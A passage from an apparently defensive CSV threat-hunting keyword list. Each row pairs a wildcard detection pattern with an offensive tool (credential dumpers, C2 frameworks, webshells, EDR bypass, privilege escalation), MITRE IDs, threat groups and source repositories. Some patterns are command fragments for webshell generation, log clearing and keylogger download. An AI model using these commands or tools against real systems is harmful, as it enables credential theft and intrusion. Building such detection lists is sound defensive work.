T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*wcfrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*WCMCredentials.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*wdextract *:\*\*.vdm*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*wdextract *\mrt.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*WDExtract-master*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*wdigest!g_fParameter_UseLogonCredential*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*wdigest!g_IsCredGuardEnabled*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*wdigest/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*--wdigest-offsets *.csv *","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*WdigestOffsets.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*We had a woodoo*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*we.exe -s rssocks -d *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*weak1337/Alcatraz*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*weakpass.com/crack-js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*weakpass.com/generate*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*weakpass/crack-js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*weakpass-main.*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*web_cloner/interceptor*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*WebBrowserPassView.exe*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*WebBrowserPassView.zip*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*webcamsnap -v*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*webclientservicescanner -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*webdavC2.py*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*WebDavC2-master.zip*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*webdavC2server.py*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*WebDeveloperSecurityChecklist*","offensive_tool_keyword","WebDeveloperSecurityChecklist","A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist","1","0","N/A","N/A","5","406","59","2021-05-10T07:48:47Z","2017-05-16T20:31:38Z" +"*web-hacking-toolkit.git*","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" 
+"*webshell http*/tomcatwar.jsp?cmd=*","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","0","N/A","N/A","1","21","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" +"*webshell_execute*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*webshell-exegol.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*weevely generate *.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*weevely https://*.php * id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*weird 
status:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Welcome to OpenBullet 2*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*wePWNise*","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. 
Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","4","351","107","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z" +"*werdhaihai/AtlasReaper*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*werfault_shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*werfault_silent_process_exit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*WerTrigger.exe*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" +"*WerTrigger-master*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" +"*wevtutil cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. 
This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wfencode -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode -e *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*WfpEscalation.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*WfpTokenDup.exe -*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*wfuzz --*.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.get_payload*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz/wordlist*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wfuzz-cli.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzzp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wgen.py*","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","1","96","37","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z" +"*wget *http-vuln-cve2020-5902.nse*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation 
tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wget* -O les.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*wget*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Wh04m1001/DFSCoerce*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 